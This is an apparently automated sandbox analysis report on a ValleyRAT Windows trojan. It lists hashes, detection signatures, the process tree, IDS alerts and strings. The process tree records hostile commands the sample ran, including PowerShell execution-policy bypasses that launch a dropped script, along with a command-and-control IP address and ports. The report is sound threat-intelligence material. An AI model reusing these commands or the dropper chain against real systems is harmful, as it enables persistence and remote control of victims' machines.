Windows Analysis Report
OdiHmn3pRK.exe

Overview

General Information

Sample name: OdiHmn3pRK.exe (renamed because original name is a hash value)
Original sample name: 11933d4b44331258739282e769ca4914.exe
Analysis ID: 1581339
MD5: 11933d4b44331258739282e769ca4914
SHA1: dbd80d352bb11812af26421bd0668d2913e93eac
SHA256: ed319509508b44b3dd2a50c735c11c2bb7d29b753435b28ab40e3d08d376e46a
Tags: exe, ValleyRAT, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to many ports of the same IP (likely port scanning)
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Found evasive API chain (may stop execution after checking mutex)
Loading BitLocker PowerShell Module
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Program Location with Network Connections
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Installs a global mouse hook
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sleep loop found (likely to delay execution)
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • OdiHmn3pRK.exe (PID: 7444 cmdline: "C:\Users\user\Desktop\OdiHmn3pRK.exe" MD5: 11933D4B44331258739282E769CA4914)
    • cmd.exe (PID: 7552 cmdline: "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • kwpswnsserver.exe (PID: 7600 cmdline: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe MD5: 607336E586D1BD00DCF1CA7EED97A8DB)
        • cmd.exe (PID: 8168 cmdline: cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 7232 cmdline: tasklist /FI "IMAGENAME eq kwpswnsserver.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 7236 cmdline: findstr /I "kwpswnsserver.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 5820 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 7700 cmdline: tasklist /FI "IMAGENAME eq kwpswnsserver.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 7648 cmdline: findstr /I "kwpswnsserver.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 5576 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 932 cmdline: tasklist /FI "IMAGENAME eq kwpswnsserver.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 2088 cmdline: findstr /I "kwpswnsserver.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 7824 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 7944 cmdline: tasklist /FI "IMAGENAME eq kwpswnsserver.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 6356 cmdline: findstr /I "kwpswnsserver.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 6620 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • cmd.exe (PID: 3496 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 3020 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 1596 cmdline: cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2200 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe, CommandLine: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe, NewProcessName: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe, OriginalFileName: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7552, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe, ProcessId: 7600, ProcessName: kwpswnsserver.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe, ParentImage: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe, ParentProcessId: 7600, ParentProcessName: kwpswnsserver.exe, ProcessCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 3496, ProcessName: cmd.exe
Source: Network Connection | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: DestinationIp: 118.107.44.219, DestinationIsIpv6: false, DestinationPort: 18852, EventID: 3, Image: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe, Initiated: true, ProcessId: 7600, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49786
Source: Process started | Author: frack113 | Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3496, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 3020, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3496, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 3020, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-27T13:10:23.432699+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.4 | 49795 | 118.107.44.219 | 19091 | TCP
2024-12-27T13:11:34.693883+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.4 | 49803 | 118.107.44.219 | 19091 | TCP

AV Detection

Source: C:\Users\Public\Bilite\Axialis\Microsoft.WindowsAppRuntime.Bootstrap.dll | ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\backup.dll | ReversingLabs: Detection: 65%
Source: OdiHmn3pRK.exe | Virustotal: Detection: 28%
Source: OdiHmn3pRK.exe | ReversingLabs: Detection: 60%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_004A39C0 CryptStringToBinaryA,CryptStringToBinaryA,Concurrency::cancel_current_task,CryptBinaryToStringA,CryptBinaryToStringA,Concurrency::cancel_current_task,ShellExecuteExW,3_2_004A39C0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C8600A0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptDestroyHash,CryptReleaseContext,3_2_6C8600A0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C861100 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptSetKeyParam,CryptDestroyKey,CryptReleaseContext,CryptSetKeyParam,CryptDestroyKey,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,CryptDestroyKey,CryptReleaseContext,3_2_6C861100
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C85FDE0 CryptStringToBinaryA,CryptStringToBinaryA,3_2_6C85FDE0

Compliance

Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Unpacked PE file: 3.2.kwpswnsserver.exe.4270000.6.unpack
Source: OdiHmn3pRK.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdby source: powershell.exe, 00000012.00000002.2580579399.0000000002DA1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\jenkins_agent\workspace\windows_desktop_new_installer_build\line-updater\LineInstaller\bin\LineInstaller.pdb source: OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2580579399.0000000002D51000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\workspace\gitlab\wns\kwpswnsserver\bin\release\kwpswnsserver.pdb2 source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000000.1759768891.00000000004D1000.00000002.00000001.01000000.00000005.sdmp, kwpswnsserver.exe, 00000003.00000002.3558976514.00000000004D1000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: \YSS\Release\Microsoft.WindowsAppRuntime.Bootstrap.pdb source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2584651859.000000000738E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\workspace\gitlab\wns\kwpswnsserver\bin\release\kwpswnsserver.pdb source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000000.1759768891.00000000004D1000.00000002.00000001.01000000.00000005.sdmp, kwpswnsserver.exe, 00000003.00000002.3558976514.00000000004D1000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2589252311.00000000084EC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000012.00000002.2589479854.000000000850F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\jenkins_agent\workspace\windows_desktop_new_installer_build\line-updater\LineInstaller\bin\LineInstaller.pdbI source: OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | File opened: z:
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | File opened: x:
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | File opened: v:
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | File opened: t:
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | File opened: r:
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | File opened: p:
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | File opened: n:
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | File opened: l:
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | File opened: j:
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | File opened: h:
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | File opened: f:
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | File opened: b:
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | File opened: y:
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | File opened: w:
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | File opened: u:
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | File opened: s:
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | File opened: q:
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | File opened: o:
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | File opened: m:
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | File opened: k:
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | File opened: i:
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | File opened: g:
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | File opened: e:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: c:
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | File opened: [:
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | Code function: 0_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_0040301A
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | Code function: 0_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402B79
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C8C816F __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,3_2_6C8C816F
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C9DF0FC FindFirstFileExW,RevokeDragDrop,FindNextFileW,FindClose,FindClose,3_2_6C9DF0FC
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C9DF04B FindFirstFileExW,3_2_6C9DF04B
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_042780F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,3_2_042780F0

Networking

Source: Network traffic | Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49795 -> 118.107.44.219:19091
Source: Network traffic | Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49803 -> 118.107.44.219:19091
Source: global traffic | TCP traffic: 118.107.44.219 ports 18852,19091,1,2,5,8
Source: global traffic | TCP traffic: 192.168.2.4:49786 -> 118.107.44.219:18852
Source: Joe Sandbox View | ASN Name: BCPL-SGBGPNETGlobalASNSG
Source: unknown | TCP traffic detected without corresponding DNS query: 118.107.44.219 (50 identical entries)
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_04273360 recv,timeGetTime,_memmove,3_2_04273360
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000011.00000002.2582173595.00000000027F2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2580579399.0000000002DA1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000012.00000002.2584243863.0000000007329000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: powershell.exe, 00000011.00000002.2594783781.0000000006F20000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.microsoftM
Source: powershell.exe, 00000011.00000002.2594783781.0000000006F20000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.microsoftMicrosoft.PowerShell.ODataAdapter.ps1
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://line.naver.jp0
Source: powershell.exe, 00000011.00000002.2589700314.0000000005985000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2582407542.00000000058F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
